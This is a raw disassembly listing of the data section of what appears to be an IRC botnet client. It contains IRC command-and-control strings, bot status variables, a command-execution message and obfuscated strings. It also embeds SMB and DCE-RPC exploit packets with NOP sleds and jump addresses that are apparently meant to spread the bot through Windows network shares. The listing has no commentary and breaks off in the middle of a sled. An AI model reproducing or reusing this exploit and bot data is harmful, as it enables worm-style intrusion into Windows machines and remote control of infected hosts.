dd 3 dup(0)
dword_419CA8 dd 27740A05h ; DATA XREF: sub_40A9CF+9DC�r
dd 3 dup(0)
dword_419CB8 dd 3F2F239h ; DATA XREF: sub_40A9CF+9A1�r
dd 3 dup(0)
dword_419CC8 dd 12E5F8h ; DATA XREF: sub_40A9CF+96C�r
dd 2 dup(0)
dword_419CD4 dd 11709839h ; DATA XREF: sub_40A9CF+937�r
dd 3 dup(0)
dword_419CE4 dd 24EBDF78h ; DATA XREF: sub_40A9CF+911�r
align 10h
dword_419CF0 dd 1274D8h ; DATA XREF: sub_40A9CF+8FC�r
dd 2 dup(0)
dword_419CFC dd 119530h ; DATA XREF: sub_40A9CF+8C5�r
dd 2 dup(0)
dword_419D08 dd 5070h ; DATA XREF: sub_40A9CF+87E�r
align 10h
aThisBuildIsBro db 'This build is broken and will not function properly.',0
; DATA XREF: sub_40A9CF:loc_40B1D8�o
align 4
aThisBuildIsFul db 'This build is fully functional',0 ; DATA XREF: sub_40A9CF+7FD�o
align 4
dword_419D68 dd 2343003h, 4B4F5242h, 2034E45h, 0 ; DATA XREF: sub_40A9CF:loc_40B1AD�o
dword_419D78 dd 2333003h, 2034B4Fh, 0 ; DATA XREF: sub_40A9CF+7D2�o
dword_419D84 dd 9Ah, 0 ; DATA XREF: sub_40A9CF+79E�o
dword_419D8C dd 95EFAFB7h, 0F78CDAE8h, 0F3ABB590h, 0EACDFBD5h, 90C4C3C2h
; DATA XREF: sub_40A9CF+790�o
dd 90E0C0C0h, 0FDADB5E8h, 2 dup(0)
dword_419DB0 dd 4CFC788h ; DATA XREF: sub_40A9CF+77A�r
dd 2 dup(0)
dword_419DBC dd 225CC0D9h ; DATA XREF: sub_40A9CF+753�r
dd 3 dup(0)
dword_419DCC dd 16C4931h ; DATA XREF: sub_40A9CF+6ED�r
dd 3 dup(0)
dword_419DDC dd 0F6F3A5A0h, 0F584B2DAh, 818FC085h, 0E9A083AFh, 8484D4BBh
; DATA XREF: sub_40A9CF+534�o
dd 87F6CDABh, 2 dup(0)
dword_419DFC dd 0D9D08FA6h, 0EEA29BE9h, 0A6BAFFBAh, 0F5BEA198h, 2 dup(0)
; DATA XREF: sub_40A9CF+448�o
dword_419E14 dd 0E4F1A9B1h, 0FB9CBBCAh, 0B0B7DD94h, 0DE84BA89h, 0E7EB9284h
; DATA XREF: sub_40A9CF+437�o
dd 0D1AA94F4h, 9DFEE3BFh, 0C4B489AFh, 0DED29490h, 0CCABACE9h
dd 0BDB1F9BBh, 2 dup(0)
dword_419E48 dd 21CC8h ; DATA XREF: sub_40A9CF+410�r
align 10h
dword_419E50 dd 3F1EAF9h ; DATA XREF: sub_40A9CF+3E9�r
align 10h
dword_419E60 dd 3EDD4F9h ; DATA XREF: sub_40A9CF+3BB�r
align 10h
dword_419E70 dd 38323166h, 2B636E65h, 20626166h, 72636564h, 65747079h
; DATA XREF: sub_40A9CF+39C�o
dd 3203A64h, 25023430h, 20373h
dword_419E90 dd 242660F8h ; DATA XREF: sub_40A9CF+2C0�r
dd 2 dup(0)
dword_419E9C dd 38323166h, 2B636E65h, 20626166h, 72636E65h, 65747079h
; DATA XREF: sub_40A9CF+2A1�o
dd 3D203A64h, 2343003h, 2037325h, 0
dword_419EC0 dd 232320h ; DATA XREF: sub_40A9CF+1E3�o
dword_419EC4 dd 2B7260F8h ; DATA XREF: sub_40A9CF+18D�r
align 10h
dword_419ED0 dd 8EB758h ; DATA XREF: sub_40A9CF+158�r
dd 2 dup(0)
dword_419EDC dd 72727543h, 20746E65h, 646E6977h, 203A776Fh, 2343003h
; DATA XREF: sub_40A9CF+139�o
dd 2037325h, 0
dword_419EF8 dd 473EDB0h ; DATA XREF: sub_40A9CF+106�r
dd 2 dup(0)
aNickS db 'NICK %s',0 ; DATA XREF: sub_40A9CF+CC�o
; sub_40A9CF+EF�o ...
dword_419F0C dd 1685E8h ; DATA XREF: sub_40A9CF+90�r
dd 2 dup(0)
dword_419F18 dd 3C1A6B1h ; DATA XREF: sub_40A9CF+69�r
dd 3 dup(0)
aLinkLink@linkP db 'link!link@link PRIVMSG %s :%s',0 ; DATA XREF: .text:0040C9C4�o
; sub_40D871+85F�o
align 4
asc_419F48: ; DATA XREF: .text:0040C96C�o
; .text:0040C9F1�o
unicode 0, <;>,0
asc_419F4C db '<=',0 ; DATA XREF: sub_40CA29:loc_40CE59�o
align 10h
asc_419F50 db '>=',0 ; DATA XREF: sub_40CA29:loc_40CE07�o
align 4
asc_419F54: ; DATA XREF: sub_40CA29:loc_40CDDB�o
dw 3Eh
unicode 0, <>,0
asc_419F58 db '!=',0 ; DATA XREF: sub_40CA29:loc_40CDAF�o
align 4
asc_419F5C db '==',0 ; DATA XREF: sub_40CA29:loc_40CD83�o
align 10h
aIpv6 db '$ipv6',0 ; DATA XREF: sub_40CA29:loc_40CC43�o
; sub_40CA29:loc_40CD58�o
align 4
aFirewall db '$firewall',0 ; DATA XREF: sub_40CA29:loc_40CC1F�o
; sub_40CA29:loc_40CD34�o
align 4
aLatency db '$latency',0 ; DATA XREF: sub_40CA29:loc_40CBFB�o
; sub_40CA29:loc_40CD10�o
align 10h
aFree db '$free',0 ; DATA XREF: sub_40CA29:loc_40CBD7�o
; sub_40CA29:loc_40CCEC�o
align 4
aVersion db '$version',0 ; DATA XREF: sub_40CA29:loc_40CBB1�o
; sub_40CA29:loc_40CCC6�o
align 4
aUptime db '$uptime',0 ; DATA XREF: sub_40CA29+158�o
; sub_40CA29+26D�o
a32s16s32s db '%32s %16s %32s',0 ; DATA XREF: sub_40CA29+EE�o
align 4
asc_419FAC db '&&',0 ; DATA XREF: sub_40CA29+9D�o
; sub_40CA29+45D�o
align 10h
asc_419FB0: ; DATA XREF: sub_40CA29+28�o
unicode 0, <)>,0
aExecutingComma db 'Executing command(s): %s',0 ; DATA XREF: sub_40CEB0+5C�o
align 10h
a6667 db '6667',0 ; DATA XREF: sub_40CF2F:loc_40CF60�o
align 4
aCSCCUCUSCCC db '%c%s%c%c%u%c%u%s%c%c%c',0 ; DATA XREF: sub_40D043+27B�o
; sub_40D871+431�o
align 10h
aG: ; DATA XREF: sub_40D043+1DC�o
; sub_40D871+392�o
unicode 0, <G>,0
aA_0: ; DATA XREF: sub_40D043+1C6�o
; sub_40D871+37C�o
unicode 0, <A>,0
aB: ; DATA XREF: sub_40D043+1B0�o
; sub_40D871+366�o
unicode 0, <B>,0
aUnk db 'UNK',0 ; DATA XREF: sub_40D043+160�o
; sub_40D871+316�o
aUserSSSS db 'USER %s %s %s :%s',0 ; DATA XREF: sub_40D043+E2�o
align 4
aPassS db 'PASS %s',0 ; DATA XREF: sub_40D043+3F�o
aNoticeS db 'NOTICE %s :',0 ; DATA XREF: sub_40D420+10�o
; sub_40D53F+37�o
aPrivmsgS db 'PRIVMSG %s :',0 ; DATA XREF: sub_40D4AB+10�o
; sub_40D53F+AF�o
align 4
dword_41A038 dd 1 ; DATA XREF: sub_40D53F:loc_40D680�o
aMessage db 'message ',0 ; DATA XREF: sub_40D53F:loc_40D629�o
align 4
dword_41A048 dd 49544F4Eh, 25204543h, 13A2073h, 0 ; DATA XREF: sub_40D53F+8F�o
dword_41A058 dd 56495250h, 2047534Dh, 3A207325h, 1 ; DATA XREF: sub_40D53F+63�o
aMirc db 'mIRC',0 ; DATA XREF: sub_40D734+6�o
; sub_40D74D:loc_40D76E�o
align 10h
asc_41A070: ; DATA XREF: sub_40D871+CB7�o
unicode 0, <*>,0
aNotice db 'NOTICE',0 ; DATA XREF: sub_40D871:loc_40E1C0�o
; sub_40E618+89�o
align 4
asc_41A07C db '][',0 ; DATA XREF: sub_40D871+807�o
; sub_40D871+88C�o
align 10h
a332 db '332',0 ; DATA XREF: sub_40D871:loc_40DF8E�o
aNick db 'NICK',0 ; DATA XREF: sub_40D871:loc_40DF3E�o
align 4
a@: ; DATA XREF: sub_40D871:loc_40DEBE�o
unicode 0, <@>,0
a302 db '302',0 ; DATA XREF: sub_40D871:loc_40DE96�o
; sub_40E618+33�o
a451 db '451',0 ; DATA XREF: sub_40D871:loc_40DE70�o
aUserhostS db 'USERHOST %s',0 ; DATA XREF: sub_40D871+5C4�o
; sub_40D871+5EE�o
aModeSXi db 'MODE %s +xi',0 ; DATA XREF: sub_40D871+571�o
a001 db '001',0 ; DATA XREF: sub_40D871:loc_40DD97�o
aModeSSmntu db 'MODE %s +smntu',0 ; DATA XREF: sub_40D871+515�o
align 4
aJoin db 'JOIN',0 ; DATA XREF: sub_40D871:loc_40DD25�o
align 4
aError db 'ERROR',0 ; DATA XREF: sub_40D871:loc_40DCFD�o
align 4
a433 db '433',0 ; DATA XREF: sub_40D871:loc_40DB2D�o
dword_41A0D8 dd 4950013Ah, 1474Eh ; DATA XREF: sub_40D871+290�o
dword_41A0E0 dd 4950013Ah, 474Eh ; DATA XREF: sub_40D871:loc_40DAEB�o
dword_41A0E8 dd 52455601h, 4E4F4953h, 1732520h, 0 ; DATA XREF: sub_40D871+265�o
aEggdropV1_6_16 db 'eggdrop v1.6.16',0 ; DATA XREF: sub_40D871:loc_40DAD1�o
dword_41A108 dd 52455601h, 4E4F4953h, 6E696C20h, 2576206Bh, 30252E64h
; DATA XREF: sub_40D871+24E�o
dd 73256433h, 69572820h, 2932336Eh, 1
dword_41A12C dd 4556013Ah, 4F495352h, 14Eh ; DATA XREF: sub_40D871+226�o
dword_41A138 dd 4556013Ah, 4F495352h, 4Eh ; DATA XREF: sub_40D871:loc_40DA81�o
aSend db 'SEND',0 ; DATA XREF: sub_40D871+CD�o
align 4
dword_41A14C dd 4344013Ah, 43h ; DATA XREF: sub_40D871+A6�o
aPrivmsg db 'PRIVMSG',0 ; DATA XREF: sub_40D871:loc_40D8DD�o
; sub_40D871+901�o ...
aMode db 'MODE',0 ; DATA XREF: sub_40D871:loc_40D8C2�o
align 4
aPong db 'PONG',0 ; DATA XREF: sub_40D871:loc_40D8A7�o
align 4
aPongS db 'PONG %s',0 ; DATA XREF: sub_40D871+25�o
aPing db 'PING',0 ; DATA XREF: sub_40D871+A�o
align 4
aLinkLink@link db 'link!link@link',0 ; DATA XREF: sub_40E618:loc_40E7A5�o
align 4
byte_41A18C db 41h ; DATA XREF: sub_40E979+3C�r
; sub_40EB4E+24�r ...
aBcdefghijklmno db 'BCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/',0
align 10h
dword_41A1D0 dd 3430032Dh, 3732502h, 30032E02h, 73250234h, 202D0203h
; DATA XREF: sub_4129CA+5C�o
dd 202E7525h, 20776152h, 6E617274h, 72656673h, 206F7420h
dd 63207325h, 6C706D6Fh, 2E657465h, 0
dd 1130h, 0
dd 5C28F5C3h, 400DC28Fh, 5 dup(0)
dd 1, 0
dd 77777777h, 77777776h, 77777775h, 77F326C6h, 77F29267h
dd 77777772h, 77F9D463h, 750362C3h, 75035173h, 3 dup(717564B8h)
dd 71AB7BFBh, 773AD507h, 7C941EEDh, 77DB565Ch, 77FD1F89h
dd 2 dup(77E216B8h), 1130h, 0
dd 5C28F5C3h, 400DC28Fh, 5 dup(0)
dd 1, 0
dd 0FFCA8166h, 6A52420Fh, 2ECD5802h, 745A053Ch, 5E21B8EFh
dd 0FA8B4A9Dh, 0AFEA75AFh, 0E7FFE775h, 0
aAjAj db '!^J!^J',0
align 4
dd 77777777h, 77777776h, 77777775h, 77F326C6h, 77F29267h
dd 77777772h, 77F32836h, 750362C3h, 75035173h, 3 dup(7C2FA0F7h)
dd 2 dup(71AB7BFBh), 7C941EEDh, 77E216B8h, 77FD1F89h, 2 dup(77E216B8h)
dd 30B0005h, 10h, 48h, 7Fh, 16D016D0h, 0
dd 1, 10001h, 1A0h, 0
dd 0C0h, 46000000h, 0
dd 8A885D04h, 11C91CEBh, 8E89Fh, 6048102Bh, 2, 0
aFxnbfxfxnbfxfx:
unicode 0, <FXNBFXFXNBFXFXFXFX>,0
align 4
dd 2 dup(7FFDE0CCh), 0
dd 3000005h, 10h, 3E8h, 0E5h, 3D0h, 40001h, 60005h, 1
dd 0
dd 0FD582432h, 496445CCh, 0AEDD70B0h, 0D2962C74h, 0D5E60h
dd 1, 0
dd 0D5E70h, 2, 0D5E7Ch, 0
dd 10h, 0F1F19680h, 11CE4D2Ah, 20006AA6h, 0F4726EAFh, 0Ch
dd 4252414Dh, 1, 0
dd 0BAADF00Dh, 0
dd 0BF4A8h, 2 dup(360h), 574F454Dh, 4, 1A2h, 0
dd 0C0h, 46000000h, 338h, 0
dd 0C0h, 46000000h, 0
dd 330h, 328h, 0
dd 81001h, 0CCCCCCCCh, 0C8h, 574F454Dh, 328h, 0D8h, 0
dd 2, 7, 4 dup(0)
dd 0CD28C4h, 0CD2964h, 0
dd 7, 1B9h, 0
dd 0C0h, 46000000h, 1ABh, 0
dd 0C0h, 46000000h, 1A5h, 0
dd 0C0h, 46000000h, 1A6h, 0
dd 0C0h, 46000000h, 1A4h, 0
dd 0C0h, 46000000h, 1ADh, 0
dd 0C0h, 46000000h, 1AAh, 0
dd 0C0h, 46000000h, 7, 60h, 58h, 90h, 40h, 20h, 78h, 30h
dd 1, 81001h, 0CCCCCCCCh, 50h, 2088B64Fh, 0FFFFFFFFh, 13h dup(0)
dd 81001h, 0CCCCCCCCh, 48h, 660007h, 20906h, 0
dd 0C0h, 46000000h, 10h, 2 dup(0)
dd 1, 0
dd 0C1978h, 58h, 60005h, 1, 9398D870h, 11D24F98h, 57BE3DA9h
dd 0B2h, 310032h, 81001h, 0CCCCCCCCh, 80h, 0BAADF00Dh
dd 4 dup(0)
dd 144318h, 0
dd 2 dup(60h), 574F454Dh, 4, 1C0h, 0
dd 0C0h, 46000000h, 33Bh, 0
dd 0C0h, 46000000h, 0
dd 30h, 10001h, 317C581h, 4AE90E80h, 8AF19999h, 857A6F50h
dd 2, 5 dup(0)
dd 1, 81001h, 0CCCCCCCCh, 30h, 6E0078h, 0
dd 0DDAD8h, 2 dup(0)
dd 0C2F20h, 2 dup(0)
dd 3, 0
dd 3, 580046h, 0
dd 81001h, 0CCCCCCCCh, 10h, 2E0030h, 4 dup(0)
dd 81001h, 0CCCCCCCCh, 68h, 0FFFF000Eh, 0B8B68h, 2, 3 dup(0)
dd 20h, 0
dd 20h, 5C005Ch, 0
aC1234561111111:
unicode 0, <\C$\123456111111111111111.doc>,0
align 10h
dd 81001h, 0CCCCCCCCh, 20h, 2D0030h, 0
dd 0C2A88h, 2, 1, 0C8C28h, 1, 7, 2 dup(0)
dd 2180310h, 10016C6h, 100139Dh, 1001C55h, 1001C98h
a__ db 0Dh,0Ah ; DATA XREF: .text:004106A2�o
; .text:00410B61�o
db '\_/.',0
align 10h
dword_41A7B0 dd 30B0005h, 10h, 48h, 0 ; DATA XREF: .text:00410658�o
dd 16D016D0h, 0
dd 1, 10000h, 4D9F4AB8h, 11CF7D1Ch, 20001E86h, 577C6EAFh
dd 0
dd 8A885D04h, 11C91CEBh, 8E89Fh, 6048102Bh, 2, 0
dword_41A7FC dd 3000005h, 10h, 5 dup(0) ; DATA XREF: .text:004107CA�o
dword_41A818 dd 10005h, 2 dup(0) ; DATA XREF: .text:004107F6�o
dd 75757D58h, 47C6EB40h, 0A74E71BCh, 97B5D01Ch, 5 dup(0)
dd 90000h, 300h, 0
dd 300h, 5C005Ch, 0
dword_41A860 dd 0 ; DATA XREF: .text:00410ABE�o
dd 2, 0
dd 1, 91C68h, 1, 2 dup(0)
dd 0C0h, 46000000h, 2 dup(1), 7
dword_41A894 dd 0FC24448Bh, 0FFFAE005h, 0E0FFFFh ; DATA XREF: .text:0041079C�o
dword_41A8A0 dd 530458Bh, 0FFFFFB24h, 0E0FFh ; DATA XREF: .text:0041072E�o
dword_41A8AC dd 19EB10EBh, 0 ; DATA XREF: .text:0041084B�o
dword_41A8B4 dd 0FFFF04EBh, 0FFFFh ; DATA XREF: .text:00410924�o
dword_41A8BC dd 4EB04EBh, 0 ; DATA XREF: .text:00410979�o
dword_41A8C4 dd 0FFFF04EBh, 0FFFFh ; DATA XREF: .text:004109CE�o
aA: ; DATA XREF: .text:00410A92�o
unicode 0, <\A>,0
align 8
dword_41A8D8 dd 77F33723h ; DATA XREF: .text:004108A3�o
dword_41A8DC dd 7FFDE0EBh ; DATA XREF: .text:004108CF�o
dword_41A8E0 dd 18759Fh ; DATA XREF: .text:00410877�o
dword_41A8E4 dd 1001C59h ; DATA XREF: .text:00410786�o
dword_41A8E8 dd 1B0B0Bh ; DATA XREF: .text:0041075A�o
dword_41A8EC dd 6EBh ; DATA XREF: .text:00410770�o
dword_41A8F0 dd 0F4EBh, 85000000h, 424D53FFh, 72h, 0C8531800h, 3 dup(0)
; DATA XREF: .text:00410744�o
dd 0FEFF0000h, 0
dd 2006200h, 4E204350h, 4F575445h, 50204B52h, 52474F52h
dd 31204D41h, 200302Eh, 4D4E414Ch, 2E314E41h, 57020030h
dd 6F646E69h, 66207377h, 5720726Fh, 676B726Fh, 70756F72h
dd 2E332073h, 2006131h, 2E314D4Ch, 30305832h, 4C020032h
dd 414D4E41h, 312E324Eh, 544E0200h, 204D4C20h, 32312E30h
dd 0
dd 0A4000000h, 424D53FFh, 73h, 0C8071800h, 3 dup(0)
dd 0FEFF0000h, 100000h, 0A400FF0Ch, 0A110400h, 0
dd 20000000h, 0
dd 0D400h, 4E006980h, 534D4C54h, 1005053h, 97000000h, 0E00882h
dd 4 dup(0)
aWindows2000219:
unicode 0, <Windows 2000 2195>,0
aWindows20005_0:
unicode 0, <Windows 2000 5.0>,0
align 4
dd 0
dd 0DA000000h, 424D53FFh, 73h, 0C8071800h, 3 dup(0)
dd 0FEFF0000h, 200800h, 0DA00FF0Ch, 0A110400h, 0
dd 57000000h, 0
dd 0D400h, 4E009F80h, 534D4C54h, 3005053h, 1000000h, 46000100h
dd 0
dd 47000000h, 0
dd 40000000h, 0
dd 40000000h, 6000000h, 40000600h, 10000000h, 47001000h
dd 15000000h, 48E0888Ah, 44004F00h, 19810000h, 0E4F27A6Ah
dd 0AF281C49h, 10742530h, 575367h, 6E0069h, 6F0064h, 730077h
dd 320020h, 300030h, 200030h, 310032h, 350039h, 570000h
dd 6E0069h, 6F0064h, 730077h, 320020h, 300030h, 200030h
dd 2E0035h, 30h, 0
dd 5C000000h, 424D53FFh, 75h, 0C8071800h, 3 dup(0)
dd 0FEFF0000h, 300800h, 5C00FF04h, 1000800h, 3100h, 5C005Ch
dd 390031h, 2E0032h, 360031h, 2E0038h, 2E0031h, 310032h
dd 5C0030h, 500049h, 240043h, 3F3F0000h, 3F3F3Fh, 0
dd 64000000h, 424D53FFh, 0A2h, 0C8071800h, 3 dup(0)
dd 4DC0800h, 400800h, 0DE00FF18h, 0E00DEh, 16h, 0
dd 2019Fh, 3 dup(0)
dd 3, 1, 40h, 2, 1103h, 6C005Ch, 610073h, 700072h, 63h
dd 0
dd 9C000000h, 424D53FFh, 25h, 0C8071800h, 3 dup(0)
dd 4DC0800h, 500800h, 48000010h, 0
dd 4, 2 dup(0)
dd 48005400h, 2005400h, 2600h, 10005940h, 50005Ch, 500049h
dd 5C0045h, 0
dd 30B0005h, 10h, 48h, 1, 10B810B8h, 0
dd 1, 10000h, 3919286Ah, 11D0B10Ch, 0C000A89Bh, 0F52ED94Fh
dd 0
dd 8A885D04h, 11C91CEBh, 8E89Fh, 6048102Bh, 2, 0
dd 0F40C0000h, 424D53FFh, 25h, 0C8071800h, 3 dup(0)
dd 4DC0800h, 600800h, 0A0000010h, 0Ch, 4, 2 dup(0)
dd 0A0005400h, 200540Ch, 2600h, 100CB140h, 50005Ch, 500049h
dd 5C0045h, 0
dd 3000005h, 10h, 0CA0h, 1, 0C88h, 90000h, 3ECh, 0
dd 3ECh, 0
dd 401495h, 3, 40707Ch, 1, 0
dd 1, 0
dd 1, 0
dd 1, 0
dd 1, 0
dd 1, 0
dd 1, 0
dd 1, 0
dd 40707Ch, 1, 0
dd 1, 0
dd 40707Ch, 1, 0
dd 1, 0
dd 40707Ch, 1, 0
dd 1, 0
dd 138578h, 0E9A65BABh, 0
dd 0F8100000h, 424D53FFh, 2Fh, 0C8071800h, 3 dup(0)
dd 0FEFF0800h, 600800h, 0DE00FF0Eh, 4000DEh, 0FF000000h
dd 8FFFFFFh, 10B800h, 4010B800h, 0
dd 0EE10B900h, 1000005h, 10h, 10B8h, 1, 200Ch, 90000h
dd 0DADh, 0
dd 0DADh, 0
dd 0D80F0000h, 424D53FFh, 25h, 0C8071800h, 3 dup(0)
dd 1180800h, 700800h, 84000010h, 0Fh, 4, 2 dup(0)
dd 84005400h, 200540Fh, 2600h, 0F9540h, 50005Ch, 500049h
dd 5C0045h, 0
dd 2000005h, 10h, 0F84h, 1, 0F6Ch, 90000h, 2 dup(0)
dd 40A89Ah, 1, 0
dd 1, 0
dd 1, 0
dd 1, 0
dd 1, 0
dd 1, 0
dd 1, 0
dd 1, 0
dd 40A89Ah, 1, 0
dd 1, 0
dd 40A89Ah, 1, 0
dd 1, 0
dd 40A89Ah, 1, 0
dd 1, 2 dup(0)
dd 1CEC8166h, 0E4FF07h, 1004600h, 7515123Ch, 751C123Ch
dd 42B68ABAh, 42D01E50h, 34000112h, 0
dd 150000h, 1B000106h, 20100h, 30C001Ch, 4002800h, 20008FFh
dd 10h, 0
aEu4 db 1Bh,'¥î4',0
align 4
dd 12400h, 0
dword_41AF50 dd 85000000h, 424D53FFh, 72h, 0C8531800h, 3 dup(0)
; DATA XREF: .text:00410BB4�o
dd 0FEFF0000h, 0
dd 2006200h
aPcNetworkProgr db 'PC NETWORK PROGRAM 1.0',0
db 2
aLanman1_0 db 'LANMAN1.0',0
dw 5702h
aIndowsForWorkg db 'indows for Workgroups 3.1a',0
db 2
aLm1_2x002 db 'LM1.2X002',0
dw 4C02h
aAnman2_1 db 'ANMAN2.1',0
db 2, 4Eh, 54h
aLm0_12 db ' LM 0.12',0
align 4
dword_41AFDC dd 0A4000000h, 424D53FFh, 73h, 0C8071800h, 3 dup(0)
; DATA XREF: .text:00410BF4�o
dd 0FEFF0000h, 100000h, 0A400FF0Ch, 0A110400h, 0
dd 20000000h, 0
dd 0D400h, 4E006980h, 534D4C54h, 1005053h, 97000000h, 0E00882h
dd 4 dup(0)
aWindows20002_0:
unicode 0, <Windows 2000 2195>,0
aWindows20005_1:
unicode 0, <Windows 2000 5.0>,0
align 8
dword_41B088 dd 0DA000000h, 424D53FFh, 73h, 0C8071800h, 3 dup(0)
; DATA XREF: .text:00410C34�o
dd 0FEFF0000h, 200800h, 0DA00FF0Ch, 0A110400h, 0
dd 57000000h, 0
dd 0D400h, 4E009F80h, 534D4C54h, 3005053h, 1000000h, 46000100h
dd 0
dd 47000000h, 0
dd 40000000h, 0
dd 40000000h, 6000000h, 40000600h, 10000000h, 47001000h
dd 15000000h, 48E0888Ah, 44004F00h, 19810000h, 0E4F27A6Ah
dd 0AF281C49h, 10742530h, 575367h, 6E0069h, 6F0064h, 730077h
dd 320020h, 300030h, 200030h, 310032h, 350039h, 570000h
dd 6E0069h, 6F0064h, 730077h, 320020h, 300030h, 200030h
dd 2E0035h, 30h, 0
dword_41B168 dd 3A000000h, 424D53FFh, 75h, 20011800h, 3 dup(0)
; DATA XREF: .text:00410C8E�o
dd 0AB80000h, 46300800h, 0FF04h, 1000000h, 0F00h, 495C5C5Ch
dd 244350h, 3F3F3F3Fh, 3Fh
dword_41B1A8 dd 5C000000h, 424D53FFh, 0A2h, 20011800h, 3 dup(0)
; DATA XREF: .text:00410CCB�o
dd 4DC0800h, 400800h, 0DE00FF18h, 800DEh, 16h, 0
dd 2019Fh, 3 dup(0)
dd 3, 1, 40h, 2, 5C000903h, 574F5242h, 524553h, 0
dword_41B20C dd 9C000000h, 424D53FFh, 25h, 0C8071800h, 3 dup(0)
; DATA XREF: .text:00410D0B�o
dd 4DC0800h, 500800h, 48000010h, 0
dd 4, 2 dup(0)
dd 48005400h, 2005400h, 2600h, 10005940h, 50005Ch, 500049h
dd 5C0045h, 0
dd 30B0005h, 10h, 48h, 1, 10B810B8h, 0
dd 1, 10000h, 4B324FC8h, 1D31670h, 475A7812h, 88E16EBFh
dd 3, 8A885D04h, 11C91CEBh, 8E89Fh, 6048102Bh, 2, 0
dword_41B2B0 dd 66030000h, 424D53FFh, 25h, 20011800h, 3 dup(0)
; DATA XREF: .text:00410D68�o
dd 3900800h, 3C1D0800h, 1C000010h, 0E0040003h, 0FFh, 2 dup(0)
dd 1C004A00h, 2004A03h, 2600h, 5C032340h, 45504950h, 5005Ch
dd 100300h, 31C0000h, 0
dd 3040000h, 0
dd 4221001Fh, 184E8h, 0
dd 10000h, 0
dd 1630000h, 0
dd 1630000h, 0
dword_41B338 dd 0 ; DATA XREF: .text:00410E19�o
dd 0D7h, 1, 0
dd 1, 0
dd 0CBh, 2 dup(0)
dword_41B35C dd 0CA040000h, 424D53FFh, 25h, 20011800h, 3 dup(0)
; DATA XREF: .text:00410E9A�o
dd 1C80800h, 7CC90800h, 80000010h, 0E0040004h, 0FFh, 2 dup(0)
dd 80004A00h, 2004A04h, 2600h, 5C048740h, 45504950h, 5005Ch
dd 100300h, 4800000h, 0
dd 4680000h, 0
dd 72B3001Fh, 1A381h, 0
dd 10000h, 0
dd 2150000h, 0
dd 2150000h, 0
dword_41B3E4 dd 0 ; DATA XREF: .text:00410F30�o
dd 85h, 2, 0
dd 2, 2EBh, 85h, 2 dup(0)
dword_41B408 dd 20804h, 0 ; DATA XREF: .text:00410DD7�o
; .text:00410DED�o ...
dword_41B410 dd 2080Ah, 0 ; DATA XREF: .text:00410DC1�o
dd 85000000h, 424D53FFh, 72h, 0C8531800h, 3 dup(0)
dd 0FEFF0000h, 0
dd 2006200h, 4E204350h, 4F575445h, 50204B52h, 52474F52h
dd 31204D41h, 200302Eh, 4D4E414Ch, 2E314E41h, 57020030h
dd 6F646E69h, 66207377h, 5720726Fh, 676B726Fh, 70756F72h
dd 2E332073h, 2006131h, 2E314D4Ch, 30305832h, 4C020032h
dd 414D4E41h, 312E324Eh, 544E0200h, 204D4C20h, 32312E30h
dd 0
dd 0A4000000h, 424D53FFh, 73h, 0C8071800h, 3 dup(0)
dd 0FEFF0000h, 100000h, 0A400FF0Ch, 0A110400h, 0
dd 20000000h, 0
dd 0D400h, 4E006980h, 534D4C54h, 1005053h, 97000000h, 0E00882h
dd 4 dup(0)
aWindows20002_1:
unicode 0, <Windows 2000 2195>,0
aWindows20005_2:
unicode 0, <Windows 2000 5.0>,0
align 4
dd 0
dd 0DA000000h, 424D53FFh, 73h, 0C8071800h, 3 dup(0)
dd 0FEFF0000h, 200800h, 0DA00FF0Ch, 0A110400h, 0
dd 57000000h, 0
dd 0D400h, 4E009F80h, 534D4C54h, 3005053h, 1000000h, 46000100h
dd 0
dd 47000000h, 0
dd 40000000h, 0
dd 40000000h, 6000000h, 40000600h, 10000000h, 47001000h
dd 15000000h, 48E0888Ah, 44004F00h, 41ED0000h, 2686272Ch
dd 0B3A059D2h, 8800AA5Eh, 57C56Fh, 6E0069h, 6F0064h, 730077h
dd 320020h, 300030h, 200030h, 310032h, 350039h, 570000h
dd 6E0069h, 6F0064h, 730077h, 320020h, 300030h, 200030h
dd 2E0035h, 30h, 0
dd 5A000000h, 424D53FFh, 75h, 0C8071800h, 3 dup(0)
dd 0FEFF0000h, 300800h, 5A00FF04h, 1000800h, 2F00h, 0
dd 3F3F0000h, 3F3F3Fh, 0
dd 66000000h, 424D53FFh, 0A2h, 0C8071800h, 3 dup(0)
dd 4780800h, 400800h, 0DE00FF18h, 1000DEh, 16h, 0
dd 2019Fh, 4 dup(0)
dd 1, 40h, 2, 1303h, 62005Ch, 6F0072h, 730077h, 720065h
dd 0
dd 9C000000h, 424D53FFh, 25h, 0C8071800h, 3 dup(0)
dd 4780800h, 500800h, 48000010h, 0
dd 10h, 2 dup(0)
dd 48005400h, 2005400h, 2600h, 5940h, 50005Ch, 500049h
dd 5C0045h, 400000h, 30B0005h, 10h, 48h, 1, 10B810B8h
dd 0
dd 1, 10000h, 8D9F4E40h, 11CEA03Dh, 8698Fh, 1B05303Eh
dd 1, 8A885D04h, 11C91CEBh, 8E89Fh, 6048102Bh, 2, 0
dd 90080000h, 424D53FFh, 25h, 0C8071800h, 3 dup(0)
dd 4780800h, 600800h, 3C000010h, 8, 1, 2 dup(0)
dd 3C005400h, 2005408h, 2600h, 84D40h, 50005Ch, 500049h
dd 5C0045h, 400000h, 3000005h, 10h, 83Ch, 1, 824h, 360000h
dd 11h, 0
dd 11h, 4F0052h, 54004Fh, 53005Ch, 530059h, 450054h, 5C004Dh
dd 2 dup(300030h), 0
dd 0FFFFh, 7E0h, 2 dup(0)
dd 7C0h, 0
dd 2 dup(90909090h), 909008EBh, 767A1567h, 909008EBh, 767A1567h
dd 909008EBh, 767A1567h, 909008EBh, 767A1567h, 909008EBh
dd 767A1567h, 909008EBh, 767A1567h, 909008EBh, 767A1567h
dd 909008EBh, 767A1567h, 909008EBh, 767A1567h, 909008EBh
dd 767A1567h, 90909090h, 0EB909090h, 48909008h, 9088444Fh
dd 4 dup(90909090h), 0
dd 90080000h, 424D53FFh, 25h, 0C8071800h, 3 dup(0)
dd 4780800h, 600800h, 3C000010h, 8, 1, 2 dup(0)
dd 3C005400h, 2005408h, 2600h, 84D40h, 50005Ch, 500049h
dd 5C0045h, 400000h, 3000005h, 10h, 83Ch, 1, 824h, 360000h
dd 11h, 0
dd 11h, 4F0052h, 54004Fh, 53005Ch, 530059h, 450054h, 5C004Dh
dd 2 dup(300030h), 0
dd 0FFFFh, 7E0h, 2 dup(0)
dd 7C0h, 0
dd 2 dup(90909090h), 909008EBh, 767A1567h, 909008EBh, 767A1567h
